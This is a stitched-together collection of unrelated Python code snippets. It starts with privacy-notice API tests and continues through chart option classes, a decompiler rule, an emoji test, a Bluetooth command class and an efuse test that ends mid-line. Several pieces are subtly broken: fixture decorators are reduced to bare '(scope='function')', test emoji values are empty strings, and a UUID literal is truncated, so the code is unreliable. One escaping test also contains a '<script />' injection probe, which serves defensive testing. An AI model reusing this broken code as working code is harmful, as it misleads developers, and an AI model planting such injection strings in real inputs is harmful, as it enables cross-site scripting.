class TestPostPrivacyNotices(): (scope='function') def url(self) -> str: return (V1_URL_PREFIX + PRIVACY_NOTICE) (scope='function') def notice_request(self, load_default_data_uses) -> Dict[(str, Any)]: return {'name': 'test privacy notice 1', 'notice_key': 'test_privacy_notice_1', 'description': 'my test privacy notice', 'regions': [PrivacyNoticeRegion.be.value, PrivacyNoticeRegion.us_ca.value], 'consent_mechanism': ConsentMechanism.opt_in.value, 'data_uses': ['marketing.advertising'], 'enforcement_level': EnforcementLevel.system_wide.value, 'displayed_in_overlay': True} (scope='function') def notice_request_no_key(self, load_default_data_uses) -> Dict[(str, Any)]: return {'name': 'My Test Privacy Notice', 'description': 'my test privacy notice', 'regions': [PrivacyNoticeRegion.be.value, PrivacyNoticeRegion.us_ca.value], 'consent_mechanism': ConsentMechanism.opt_in.value, 'data_uses': ['marketing.advertising'], 'enforcement_level': EnforcementLevel.system_wide.value, 'displayed_in_overlay': True} (scope='function') def notice_request_2(self, load_default_data_uses) -> Dict[(str, Any)]: return {'name': 'test privacy notice 2', 'notice_key': 'test_privacy_notice_2', 'regions': [PrivacyNoticeRegion.us_ca.value], 'consent_mechanism': ConsentMechanism.opt_in.value, 'data_uses': ['personalize'], 'enforcement_level': EnforcementLevel.system_wide.value, 'displayed_in_overlay': True} def test_post_privacy_notice_unauthenticated(self, url, api_client): resp = api_client.post(url) assert (resp.status_code == 401) def test_post_privacy_notice_wrong_scope(self, url, api_client: TestClient, generate_auth_header): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_READ]) resp = api_client.post(url, headers=auth_header) assert (resp.status_code == 403) def test_post_invalid_privacy_notice_missing_field(self, api_client: TestClient, generate_auth_header, url, notice_request: dict[(str, Any)], notice_request_2: dict[(str, Any)]): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) notice_request_no_name: dict[(str, Any)] = notice_request.copy() notice_request_no_name.pop('name') resp = api_client.post(url, headers=auth_header, json=[notice_request_no_name]) assert (resp.status_code == 422) resp = api_client.post(url, headers=auth_header, json=[notice_request_no_name, notice_request_2]) assert (resp.status_code == 422) def test_post_invalid_privacy_notice_includes_id(self, api_client: TestClient, generate_auth_header, url, notice_request: dict[(str, Any)], notice_request_2: dict[(str, Any)]): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) notice_request_with_id: dict[(str, Any)] = notice_request.copy() notice_request_with_id['id'] = 'pn_1' resp = api_client.post(url, headers=auth_header, json=[notice_request_with_id]) assert (resp.status_code == 422) def test_post_invalid_privacy_notice_invalid_values(self, api_client: TestClient, generate_auth_header, url, notice_request: dict[(str, Any)]): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) notice_request_bad_region: dict[(str, Any)] = notice_request.copy() notice_request_bad_region['regions'] = [] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_region]) assert (resp.status_code == 422) notice_request_bad_region['regions'] = ['invalid_region'] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_region]) assert (resp.status_code == 422) notice_request_bad_region['regions'] = [PrivacyNoticeRegion.be.value, 'invalid_region'] 
resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_region]) assert (resp.status_code == 422) notice_request_bad_region.pop('regions') resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_region]) assert (resp.status_code == 422) notice_request_bad_data_uses: dict[(str, Any)] = notice_request.copy() notice_request_bad_data_uses['data_uses'] = [] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_data_uses]) assert (resp.status_code == 422) notice_request_bad_data_uses['data_uses'] = ['invalid_data_use'] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_data_uses]) assert (resp.status_code == 422) notice_request_bad_data_uses['data_uses'] = ['marketing.advertising', 'invalid_data_use'] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_data_uses]) assert (resp.status_code == 422) notice_request_bad_data_uses.pop('data_uses') resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_data_uses]) assert (resp.status_code == 422) notice_request_bad_cm: dict[(str, Any)] = notice_request.copy() notice_request_bad_cm['consent_mechanism'] = ['invalid_mechanism'] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_cm]) assert (resp.status_code == 422) notice_request_bad_el: dict[(str, Any)] = notice_request.copy() notice_request_bad_el['enforcement_level'] = ['invalid'] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_el]) assert (resp.status_code == 422) def test_post_invalid_privacy_notice_data_use_conflicts_within_request(self, api_client: TestClient, generate_auth_header, url, notice_request: dict[(str, Any)]): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) notice_request_identical_use = notice_request.copy() notice_request_identical_use['name'] = 'different notice name' notice_request_identical_use['regions'] = [PrivacyNoticeRegion.be.value] resp = api_client.post(url, headers=auth_header, json=[notice_request, notice_request_identical_use]) assert (resp.status_code == 422) notice_request_child_use = notice_request.copy() notice_request_child_use['name'] = 'different notice name' notice_request_child_use['regions'] = [PrivacyNoticeRegion.be.value] notice_request_child_use['data_uses'] = ['marketing.advertising.first_party'] resp = api_client.post(url, headers=auth_header, json=[notice_request, notice_request_child_use]) assert (resp.status_code == 422) def test_post_invalid_privacy_notice_data_use_conflicts_with_existing_notice(self, api_client: TestClient, generate_auth_header, url, privacy_notice: PrivacyNotice, privacy_notice_us_co_third_party_sharing: PrivacyNotice, notice_request: dict[(str, Any)], db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) notice_request_updated_data_use = notice_request.copy() notice_request_updated_data_use['data_uses'] = ['marketing.advertising.first_party', 'third_party_sharing'] resp = api_client.post(url, headers=auth_header, json=[notice_request_updated_data_use]) assert (resp.status_code == 422) privacy_notice.update(db, data={'disabled': True}) resp = api_client.post(url, headers=auth_header, json=[notice_request_updated_data_use]) assert (resp.status_code == 200) def test_post_privacy_notice_opt_in_must_be_displayed_in_overlay(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url): assert
(notice_request['consent_mechanism'] == ConsentMechanism.opt_in.value) notice_request['displayed_in_overlay'] = False auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) assert (resp.json()['detail'][0]['msg'] == 'Opt-in notices must be served in an overlay.') def test_post_privacy_notice_opt_out_must_be_displayed_in_overlay_or_privacy_center(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url): notice_request['consent_mechanism'] = ConsentMechanism.opt_out.value notice_request['displayed_in_overlay'] = False notice_request['displayed_in_privacy_center'] = False auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) assert (resp.json()['detail'][0]['msg'] == 'Opt-out notices must be served in an overlay or the privacy center.') def test_post_privacy_notice_notice_only_must_be_displayed_in_overlay(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url): notice_request['consent_mechanism'] = ConsentMechanism.notice_only.value notice_request['displayed_in_overlay'] = False notice_request['displayed_in_privacy_center'] = False auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) assert (resp.json()['detail'][0]['msg'] == 'Notice-only notices must be served in an overlay.') def test_post_privacy_notice_bad_notice_key(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url): notice_request['notice_key'] = "My Notice's Key" auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) assert ('FidesKeys must only contain alphanumeric characters' in resp.json()['detail'][0]['msg']) def test_post_privacy_notice(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) before_creation = datetime.now().isoformat() (overlay_exp, privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.be) assert (overlay_exp is None) assert (privacy_center_exp is None) (ca_overlay_exp, ca_privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.us_ca) assert (ca_overlay_exp is None) assert (ca_privacy_center_exp is None) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 200) assert (len(resp.json()) == 1) response_notice = resp.json()[0] assert (response_notice['name'] == notice_request['name']) assert ('id' in response_notice) assert (response_notice['version'] == 1.0) assert (response_notice['created_at'] < datetime.now().isoformat()) assert (response_notice['created_at'] > before_creation) assert (response_notice['updated_at'] < datetime.now().isoformat()) assert (response_notice['updated_at'] > before_creation) assert (not response_notice['disabled']) db_notice: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice['id']) assert (response_notice['name'] == db_notice.name) assert (response_notice['version'] == db_notice.version) assert 
(response_notice['created_at'] == db_notice.created_at.isoformat()) assert (response_notice['updated_at'] == db_notice.updated_at.isoformat()) assert (response_notice['disabled'] == db_notice.disabled) (overlay_exp, privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.be) assert (overlay_exp is not None) assert (overlay_exp.experience_config_id is not None) overlay_copy = overlay_exp.experience_config assert (overlay_copy.component == ComponentType.overlay) assert overlay_copy.is_default assert (privacy_center_exp is None) (ca_overlay_exp, ca_privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.us_ca) overlay_exp.delete(db) ca_overlay_exp.delete(db) def test_post_privacy_notice_no_notice_key(self, api_client: TestClient, generate_auth_header, notice_request_no_key: dict[(str, Any)], url, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) before_creation = datetime.now().isoformat() (overlay_exp, privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.be) assert (overlay_exp is None) assert (privacy_center_exp is None) (ca_overlay_exp, ca_privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.us_ca) assert (ca_overlay_exp is None) assert (ca_privacy_center_exp is None) resp = api_client.post(url, headers=auth_header, json=[notice_request_no_key]) assert (resp.status_code == 200) assert (len(resp.json()) == 1) response_notice = resp.json()[0] assert (response_notice['name'] == notice_request_no_key['name']) assert ('id' in response_notice) assert (response_notice['version'] == 1.0) assert (response_notice['created_at'] < datetime.now().isoformat()) assert (response_notice['created_at'] > before_creation) assert (response_notice['updated_at'] < datetime.now().isoformat()) assert (response_notice['updated_at'] > before_creation) assert (response_notice['notice_key'] == 'my_test_privacy_notice') assert (not response_notice['disabled']) db_notice: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice['id']) assert (response_notice['name'] == db_notice.name) assert (response_notice['version'] == db_notice.version) assert (response_notice['created_at'] == db_notice.created_at.isoformat()) assert (response_notice['updated_at'] == db_notice.updated_at.isoformat()) assert (response_notice['disabled'] == db_notice.disabled) assert (response_notice['notice_key'] == 'my_test_privacy_notice') (overlay_exp, privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.be) assert (overlay_exp is not None) assert (privacy_center_exp is None) assert (overlay_exp.component == ComponentType.overlay) assert (overlay_exp.experience_config_id is not None) (ca_overlay_exp, ca_privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.us_ca) assert (ca_overlay_exp is not None) assert (ca_privacy_center_exp is None) assert (ca_overlay_exp.component == ComponentType.overlay) assert (ca_overlay_exp.experience_config_id is not None) overlay_exp.delete(db) def test_post_privacy_notice_response_escaped(self, api_client, generate_auth_header, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) maybe_dangerous_description = "user's description <script />" resp = api_client.post((V1_URL_PREFIX + 
PRIVACY_NOTICE), headers=auth_header, json=[{'name': 'test privacy notice 1', 'notice_key': 'test_privacy_notice_1', 'description': maybe_dangerous_description, 'regions': [PrivacyNoticeRegion.be.value, PrivacyNoticeRegion.us_ca.value], 'consent_mechanism': ConsentMechanism.opt_in.value, 'data_uses': ['marketing.advertising'], 'enforcement_level': EnforcementLevel.system_wide.value, 'displayed_in_overlay': True}]) assert (resp.status_code == 200) created_notice_data = resp.json()[0] assert (created_notice_data['description'] == "user's description <script />") created_notice = db.query(PrivacyNotice).get(created_notice_data['id']) assert (created_notice.description == 'user&#x27;s description &lt;script /&gt;') def test_post_privacy_notice_duplicate_regions(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) last_region = notice_request['regions'][(- 1)] notice_request['regions'].append(last_region) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) assert (resp.json()['detail'][0]['msg'] == 'Duplicate regions found.') def test_post_privacy_notice_twice_same_name(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) before_creation = datetime.now().isoformat() resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 200) assert (len(resp.json()) == 1) response_notice = resp.json()[0] assert (response_notice['name'] == notice_request['name']) assert ('id' in response_notice) assert (response_notice['version'] == 1.0) assert (response_notice['created_at'] < datetime.now().isoformat()) assert (response_notice['created_at'] > before_creation) assert (response_notice['updated_at'] < datetime.now().isoformat()) assert (response_notice['updated_at'] > before_creation) assert (not response_notice['disabled']) db_notice: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice['id']) assert (response_notice['name'] == db_notice.name) assert (response_notice['version'] == db_notice.version) assert (response_notice['created_at'] == db_notice.created_at.isoformat()) assert (response_notice['updated_at'] == db_notice.updated_at.isoformat()) assert (response_notice['disabled'] == db_notice.disabled) notice_request['regions'] = [PrivacyNoticeRegion.us_co.value] before_creation_2 = datetime.now().isoformat() resp_2 = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp_2.status_code == 200) assert (len(resp_2.json()) == 1) response_notice_2 = resp_2.json()[0] assert (response_notice_2['name'] == notice_request['name']) assert ('id' in response_notice_2) assert (response_notice_2['version'] == 1.0) assert (response_notice_2['created_at'] < datetime.now().isoformat()) assert (response_notice_2['created_at'] > before_creation_2) assert (response_notice_2['updated_at'] < datetime.now().isoformat()) assert (response_notice_2['updated_at'] > before_creation_2) assert (not response_notice_2['disabled']) db_notice_2: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice_2['id']) db.refresh(db_notice_2) assert (response_notice_2['name'] == db_notice_2.name) assert (response_notice_2['version'] == db_notice_2.version) assert (response_notice_2['created_at'] == db_notice_2.created_at.isoformat()) assert (response_notice_2['updated_at'] == 
db_notice_2.updated_at.isoformat()) assert (response_notice_2['disabled'] == db_notice_2.disabled) assert (db_notice.id != db_notice_2.id) def test_post_multiple_privacy_notice(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], notice_request_2: dict[(str, Any)], url, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) before_creation = datetime.now().isoformat() resp = api_client.post(url, headers=auth_header, json=[notice_request, notice_request_2]) assert (resp.status_code == 200) assert (len(resp.json()) == 2) response_notice = resp.json()[0] assert (response_notice['name'] == notice_request['name']) assert ('id' in response_notice) assert (response_notice['version'] == 1.0) assert (response_notice['created_at'] < datetime.now().isoformat()) assert (response_notice['created_at'] > before_creation) assert (response_notice['updated_at'] < datetime.now().isoformat()) assert (response_notice['updated_at'] > before_creation) assert (not response_notice['disabled']) db_notice: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice['id']) assert (response_notice['name'] == db_notice.name) assert (response_notice['version'] == db_notice.version) assert (response_notice['created_at'] == db_notice.created_at.isoformat()) assert (response_notice['updated_at'] == db_notice.updated_at.isoformat()) assert (response_notice['disabled'] == db_notice.disabled) response_notice_2 = resp.json()[1] assert (response_notice_2['name'] == notice_request_2['name']) assert ('id' in response_notice_2) assert (response_notice_2['version'] == 1.0) assert (response_notice_2['created_at'] < datetime.now().isoformat()) assert (response_notice_2['created_at'] > before_creation) assert (response_notice_2['updated_at'] < datetime.now().isoformat()) assert (response_notice_2['updated_at'] > before_creation) assert (not response_notice_2['disabled']) db_notice_2: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice_2['id']) db.refresh(db_notice_2) assert (response_notice_2['name'] == db_notice_2.name) assert (response_notice_2['version'] == db_notice_2.version) assert (response_notice_2['created_at'] == db_notice_2.created_at.isoformat()) assert (response_notice_2['updated_at'] == db_notice_2.updated_at.isoformat()) assert (response_notice_2['disabled'] == db_notice_2.disabled) def test_post_multiple_privacy_notice_notice_key_overlap(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], notice_request_2: dict[(str, Any)], url, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) notice_request_2['notice_key'] = 'test_privacy_notice_1' resp = api_client.post(url, headers=auth_header, json=[notice_request, notice_request_2]) assert (resp.status_code == 422) assert (resp.json()['detail'] == "Privacy Notice 'test privacy notice 1' has already assigned notice key 'test_privacy_notice_1' to region 'us_ca'")
class OptionPlotoptionsPackedbubbleSonificationDefaultinstrumentoptionsMappingPlaydelay(Options): @property def mapFunction(self): return self._config_get(None) @mapFunction.setter def mapFunction(self, value: Any): self._config(value, js_type=False) @property def mapTo(self): return self._config_get(None) @mapTo.setter def mapTo(self, text: str): self._config(text, js_type=False) @property def max(self): return self._config_get(None) @max.setter def max(self, num: float): self._config(num, js_type=False) @property def min(self): return self._config_get(None) @min.setter def min(self, num: float): self._config(num, js_type=False) @property def within(self): return self._config_get(None) @within.setter def within(self, value: Any): self._config(value, js_type=False)
def test_saving_image(monkeypatch): mock_file_open = mock_open() fake_uuid = '123e4567-e89b-12d3-a456-' def mock_uuidgen(): return fake_uuid fake_image_bytes = b'fake-image-bytes' fake_request_stream = io.BytesIO(fake_image_bytes) storage_path = 'fake-storage-path' store = look.images.ImageStore(storage_path, uuidgen=mock_uuidgen, fopen=mock_file_open) assert (store.save(fake_request_stream, 'image/png') == (fake_uuid + '.png')) assert (call().write(fake_image_bytes) in mock_file_open.mock_calls)
class SequenceRule(LoopStructuringRule): @staticmethod def can_be_applied(loop_node: AbstractSyntaxTreeNode): if ((not loop_node.is_endless_loop) or (not isinstance((body := loop_node.body), SeqNode))): return False end_nodes: Set[CodeNode] = set() for end_node in body.get_end_nodes(): if (not end_node.is_code_node_ending_with_break): return False end_nodes.add(end_node) return _has_only_loop_interruptions_in(end_nodes, body) def restructure(self): loop_node: LoopNode = self._asforest.current_root loop_body = loop_node.body self._delete_break_statements_for_loop(loop_body) self._asforest.remove_current_root() self._asforest.remove_root_node(loop_node) self._asforest.set_current_root(loop_body) def _delete_break_statements_for_loop(self, ast_node: AbstractSyntaxTreeNode): for code_node in ast_node.get_end_nodes(): code_node.clean() if code_node.does_end_with_break: code_node.instructions = code_node.instructions[:(- 1)] self._asforest.clean_up(ast_node)
class OptionPlotoptionsOrganizationSonificationContexttracksMappingGapbetweennotes(Options): @property def mapFunction(self): return self._config_get(None) @mapFunction.setter def mapFunction(self, value: Any): self._config(value, js_type=False) @property def mapTo(self): return self._config_get(None) @mapTo.setter def mapTo(self, text: str): self._config(text, js_type=False) @property def max(self): return self._config_get(None) @max.setter def max(self, num: float): self._config(num, js_type=False) @property def min(self): return self._config_get(None) @min.setter def min(self, num: float): self._config(num, js_type=False) @property def within(self): return self._config_get(None) @within.setter def within(self, value: Any): self._config(value, js_type=False)
@pytest.mark.parametrize('icon', ['', '', '']) def test_usage_single_emoji(nlp, icon): nlp.add_pipe('emoji') doc = nlp(('Hello %s world' % icon)) assert doc._.has_emoji assert doc[1]._.is_emoji assert (doc[1]._.emoji_desc == nlp.get_pipe('emoji').get_emoji_desc(doc[1])) assert doc[1:3]._.has_emoji assert (len(doc._.emoji) == 1) (emoji_text, emoji_idx, emoji_desc) = doc._.emoji[0] assert (emoji_text == icon) assert (emoji_idx == 1)
def extractForumWuxiaworldCom(item): (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title']) if ((not (chp or vol)) or ('preview' in item['title'].lower())): return False if ('WATTT' in item['tags']): return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix) return False
def get_module_class(python_module: str, python_class: str) -> Type[Module]: mod = importlib.import_module(python_module) if hasattr(mod, python_class): cls = getattr(mod, python_class) else: real_class_name = python_class for attr_name in dir(mod): attr = getattr(mod, attr_name) if inspect.isclass(attr): if (attr.__name__ == real_class_name): python_class = attr_name break else: raise NameError(f'Could not find a Labgraph class in module `{python_module}` with the following class.__name__: `{real_class_name}`. If it refers to an anonymous class, consider moving it to the module scope of {python_module}.') cls = getattr(mod, python_class) if (not issubclass(cls, Module)): raise TypeError(f'Expected a subclass of {Module.__name__}, got {cls.__name__}') return cls
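# --- The fallback branch above scans a module for a class whose __name__ matches when
# the direct attribute lookup fails (e.g. the class was re-exported under another name).
# A self-contained demo of the same strategy against a stdlib module:
import importlib
import inspect

mod = importlib.import_module('collections')
wanted = 'OrderedDict'
cls = getattr(mod, wanted, None)
if cls is None:
    # Scan for a class bound under a different attribute name.
    for attr_name in dir(mod):
        attr = getattr(mod, attr_name)
        if inspect.isclass(attr) and attr.__name__ == wanted:
            cls = attr
            break
print(cls)  # <class 'collections.OrderedDict'>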
class AudioDataset(Dataset): def __init__(self, list_of_wav_files, sr, processor): self.list_of_wav_files = list_of_wav_files self.processor = processor self.sr = sr def __len__(self): return len(self.list_of_wav_files) def __getitem__(self, idx): wav_file = self.list_of_wav_files[idx] (audio_data, _) = librosa.load(wav_file, sr=self.sr) processed_data = self.processor(audio_data, sampling_rate=self.sr)['input_values'][0] return torch.from_numpy(processed_data)
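# --- Usage sketch for AudioDataset above. The checkpoint name and file paths are
# placeholders; assumes the HuggingFace `transformers` feature extractor, whose call
# returns a dict with an 'input_values' batch the way the `processor` above expects.
from torch.utils.data import DataLoader
from transformers import Wav2Vec2FeatureExtractor

processor = Wav2Vec2FeatureExtractor.from_pretrained('facebook/wav2vec2-base')
dataset = AudioDataset(['clip1.wav', 'clip2.wav'], sr=16000, processor=processor)
# batch_size=1 sidesteps padding; batching variable-length clips would need a collate_fn.
loader = DataLoader(dataset, batch_size=1)
for batch in loader:
    print(batch.shape)  # torch.Size([1, num_samples])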
class HCI_Cmd_LE_Set_Extended_Scan_Params(HCI_Command): def __init__(self, oaddr_type=0, nfilter=0, phys=1, scan_type=([0] * 8), interval=([10] * 8), window=([750] * 8)): super().__init__(b'\x08', b'A') self.payload.append(EnumByte('own address type', oaddr_type, {0: 'Public', 1: 'Random', 2: 'Private IRK or Public', 3: 'Private IRK or Random'})) self.payload.append(EnumByte('filter policy', nfilter, {0: 'None', 1: 'Sender In White List', 2: 'Almost None', 3: 'SIWL and some'})) self.payload.append(BitFieldByte('PHYs', phys, ['LE 1M', 'Reserv', 'LE Coded', 'Reserv', 'Reserv', 'Reserv', 'Reserv', 'Reserv'])) i = 0 mask = 1 while (i < 8): if (phys & mask): self.payload.append(EnumByte('scan type', scan_type[i], {0: 'Passive', 1: 'Active'})) self.payload.append(UShortInt('Interval', int(round((min(10240, max(2.5, interval[i])) / 0.625))), endian='little')) self.payload.append(UShortInt('Window', int(round((min(10240, max(2.5, min(interval[i], window[i]))) / 0.625))), endian='little')) mask <<= 1 i += 1
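# --- The Interval/Window fields above are encoded in 0.625 ms radio units, clamped to
# the BLE spec range of 2.5..10240 ms. Quick check of the constructor's default 10 ms:
interval_ms = 10
units = int(round(min(10240, max(2.5, interval_ms)) / 0.625))
print(units)  # 16, stored little-endian in the 'Interval' UShortInt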
class WallSettings(Settings): absolute_params: dict[(str, Any)] = {} relative_params = {'edge_width': 1.0} base_class = WallEdge def edgeObjects(self, boxes, chars='aAbBcCdD|', add=True): bc = self.base_class bn = bc.__name__ wallholes = type((bn + 'Hole'), (WallHoles, bc), {})(boxes, self) edges = [bc(boxes, self), type((bn + 'Reversed'), (bc,), {'_reversed': True})(boxes, self), type((bn + 'Joined'), (WallJoinedEdge, bc), {})(boxes, self), type((bn + 'JoinedReversed'), (WallJoinedEdge, bc), {'_reversed': True})(boxes, self), type((bn + 'Back'), (WallBackEdge, bc), {})(boxes, self), type((bn + 'BackReversed'), (WallBackEdge, bc), {'_reversed': True})(boxes, self), type((bn + 'Hole'), (WallHoleEdge, bc), {})(boxes, wallholes), type((bn + 'HoleReversed'), (WallHoleEdge, bc), {'_reversed': True})(boxes, wallholes), wallholes] return self._edgeObjects(edges, boxes, chars, add)
class OptionPlotoptionsCylinderSonificationContexttracksMapping(Options): @property def frequency(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingFrequency': return self._config_sub_data('frequency', OptionPlotoptionsCylinderSonificationContexttracksMappingFrequency) @property def gapBetweenNotes(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingGapbetweennotes': return self._config_sub_data('gapBetweenNotes', OptionPlotoptionsCylinderSonificationContexttracksMappingGapbetweennotes) @property def highpass(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingHighpass': return self._config_sub_data('highpass', OptionPlotoptionsCylinderSonificationContexttracksMappingHighpass) @property def lowpass(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingLowpass': return self._config_sub_data('lowpass', OptionPlotoptionsCylinderSonificationContexttracksMappingLowpass) @property def noteDuration(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingNoteduration': return self._config_sub_data('noteDuration', OptionPlotoptionsCylinderSonificationContexttracksMappingNoteduration) @property def pan(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingPan': return self._config_sub_data('pan', OptionPlotoptionsCylinderSonificationContexttracksMappingPan) @property def pitch(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingPitch': return self._config_sub_data('pitch', OptionPlotoptionsCylinderSonificationContexttracksMappingPitch) @property def playDelay(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingPlaydelay': return self._config_sub_data('playDelay', OptionPlotoptionsCylinderSonificationContexttracksMappingPlaydelay) @property def rate(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingRate': return self._config_sub_data('rate', OptionPlotoptionsCylinderSonificationContexttracksMappingRate) @property def text(self): return self._config_get(None) @text.setter def text(self, text: str): self._config(text, js_type=False) @property def time(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingTime': return self._config_sub_data('time', OptionPlotoptionsCylinderSonificationContexttracksMappingTime) @property def tremolo(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingTremolo': return self._config_sub_data('tremolo', OptionPlotoptionsCylinderSonificationContexttracksMappingTremolo) @property def volume(self) -> 'OptionPlotoptionsCylinderSonificationContexttracksMappingVolume': return self._config_sub_data('volume', OptionPlotoptionsCylinderSonificationContexttracksMappingVolume)
class ReachFrequencyPredictionMixin(): def reserve(self, prediction_to_release=None, reach=None, budget=None, impression=None): params = {self.Field.prediction_id: self.get_id_assured(), self.Field.prediction_id_to_release: prediction_to_release, self.Field.budget: budget, self.Field.reach: reach, self.Field.impression: impression, self.Field.action: self.Action.reserve} params = {k: v for (k, v) in params.items() if (v is not None)} response = self.get_api_assured().call('POST', (self.get_parent_id_assured(), self.get_endpoint()), params=params) return self.__class__(response.body(), self.get_parent_id_assured()) def cancel(self): params = {self.Field.prediction_id: self.get_id_assured(), self.Field.action: self.Action.cancel} self.get_api_assured().call('POST', (self.get_parent_id_assured(), self.get_endpoint()), params=params) return self
@pytest.mark.skipif((arg_chip not in ['esp32s2', 'esp32s3', 'esp32s3beta1', 'esp32c3', 'esp32h2beta1', 'esp32c6', 'esp32h2', 'esp32p4']), reason='Supports 6 key blocks') class TestBurnKeyDigestCommands(EfuseTestCase): def test_burn_key_digest(self): self.espefuse_py('burn_key_digest -h') self.espefuse_py(f'burn_key_digest BLOCK_KEY0 {S_IMAGES_DIR}/rsa_secure_boot_signing_key.pem SECURE_BOOT_DIGEST0 BLOCK_KEY1 {S_IMAGES_DIR}/rsa_secure_boot_signing_key2.pem SECURE_BOOT_DIGEST1 BLOCK_KEY2 ', check_msg='A fatal error occurred: The number of blocks (3), datafile (2) and keypurpose (2) should be the same.', ret_code=2) self.espefuse_py(f'burn_key_digest BLOCK_KEY0 {S_IMAGES_DIR}/rsa_secure_boot_signing_key.pem SECURE_BOOT_DIGEST0 BLOCK_KEY1 {S_IMAGES_DIR}/rsa_secure_boot_signing_key2.pem SECURE_BOOT_DIGEST1 BLOCK_KEY2 {S_IMAGES_DIR}/rsa_secure_boot_signing_key2.pem SECURE_BOOT_DIGEST2') output = self.espefuse_py('summary -d') assert (1 == output.count(' = cb 27 91 a3 71 b0 c0 32 2b f7 37 04 78 ba 09 62 22 4c ab 1c f2 28 78 79 e4 29 67 3e 7d a8 44 63 R/-')) assert (2 == output.count(' = 90 1a 74 09 23 8d 52 d4 cb f9 6f 56 3f b3 f4 29 6d ab d6 6a 33 f5 3b 15 ee cd 8c b3 e7 ec 45 d3 R/-')) def test_burn_key_from_digest(self): self.espefuse_py(f'burn_key BLOCK_KEY0 {S_IMAGES_DIR}/rsa_public_key_digest.bin SECURE_BOOT_DIGEST0') output = self.espefuse_py('summary -d') assert (1 == output.count(' = cb 27 91 a3 71 b0 c0 32 2b f7 37 04 78 ba 09 62 22 4c ab 1c f2 28 78 79 e4 29 67 3e 7d 